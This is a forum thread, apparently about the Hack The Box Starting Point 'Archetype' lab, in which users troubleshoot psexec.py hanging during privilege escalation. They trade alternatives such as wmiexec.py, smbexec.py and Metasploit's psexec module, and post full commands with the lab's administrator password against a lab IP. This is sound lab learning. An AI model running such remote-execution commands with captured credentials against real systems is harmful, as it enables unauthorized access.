Starting Point (psexec.py)

When attempting privilege escalation I’m having issues with psexec.py hanging on the uploading file step. I’ve tried psexec and Metasploit as well as two different images of Kali and get the same on both. I’ve done quite a bit of searching and can’t figure it out so any ideas are appreciated.

psexec:

root@kali:~# psexec.py ‘administrator:MEGACORP_4dm1n!!@10.10.10.27

[] Requesting shares on 10.10.10.27…
[
] Found writable share ADMIN$
[*] Uploading file KmgOXzkz.exe

Metasploit:

[] Started reverse TCP handler on 10.10.14.49:4444
[
] 10.10.10.27:445 - Connecting to the server…
[] 10.10.10.27:445 - Authenticating to 10.10.10.27:445 as user ‘administrator’…
[
] 10.10.10.27:445 - Selecting PowerShell target
[] 10.10.10.27:445 - Executing the payload…
[+] 10.10.10.27:445 - Service start timed out, OK if running a command or non-service executable…
[
] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >

Double check your password. You have a typo.

EDIT: Just kidding, your password is correct.

Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

Type your comment> @johniesmithe said:

Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

yeah I’ve always had more success with wmiexec as well for some reason. Never looked into it but interesting to see you come to the same conclusion

Type your comment> @johniesmithe said:

Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

Thank god I stumbled across this, was about to start going ■■■■■ deep into psexec.py
Cheers

Tried wmiexec.py too… but no joy.

Box broken?

python3 psexec.py administrator@10.10.10.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Password:
[-] [Errno Connection error (10.10.10.27:445)] timed out

Why is this happening

Someone helped me out I stuck on python3 -m http.server 80
=> This is just showing following;

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)…
Pls help me

@deepnest said:

Someone helped me out I stuck on python3 -m http.server 80
=> This is just showing following;

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)…
Pls help me

Thats a server waiting for a connection. What do you want it to do?

The EXE seems to fail to upload. And if I connect I can see the file is *created* but is zero bytes $psexec.py administrator@10.10.10.27 Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation Password: [*] Requesting shares on 10.10.10.27… [*] Found writable share ADMIN$ [*] Uploading file haPxsSWA.exe

Looking at it in another konsole:
% smbclient \\10.10.10.27\ADMIN$ -U WORKGROUP\Administrator

smb: > dir ha*
haPxsSWA.exe A 0 Sun Sep 12 17:02:10 2021

            10328063 blocks of size 4096. 8260227 blocks available

> @jmeister234 said: > The EXE seems to fail to upload. And if I connect I can see the file is *created* but is zero bytes > > $psexec.py administrator@10.10.10.27 > Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation > > Password: > [*] Requesting shares on 10.10.10.27… > [*] Found writable share ADMIN$ > [*] Uploading file haPxsSWA.exe > >
>
> Looking at it in another konsole:
> % smbclient \\10.10.10.27\ADMIN$ -U WORKGROUP\Administrator
>
> smb: > dir ha*
> haPxsSWA.exe A 0 Sun Sep 12 17:02:10 2021
>
> 10328063 blocks of size 4096. 8260227 blocks available
>

Used smbexec instead of psexec or wmiexec.py since I couldn’t get them to work:

$ smbexec.py -debug ‘administrator:MEGACORP_4dm1n!!@10.10.10.27

so… reviewing all the startingpoint boxes just to have something (truly) “easy” to do for once… lol… anyway my psexec.py session fails at the very end with “Error performing the uninstallation”. I know this is an old thread but… It would actually be very informative if someone could clearly discover what the point of failure in grabbing the SMB session IS… since the walkthrough is taking all the newbies down a rosy path with an alligator at the end… lol… I tried -no-pass… I tried delaying the password response (in reaction to an old post that said there was success after adding a 2 second delay to some python2.7/impacket file)… I tried forcing it to grab the C$ share instead of the admin$ share … all without success.

Ping the archetype’s IP.

If you’re getting a “Destination Host Unreachable” the path is down - for any number or reasons.

Terminate the Pwnbox and the spawned ‘Archetype’ machine. Then, re-open the Pwnbox and spawn a new ‘Archetype’.

ping the new archetype IP. Does it work? cool. Re-try the psexec.py, or wmiexec.py commands.

Happy hunting.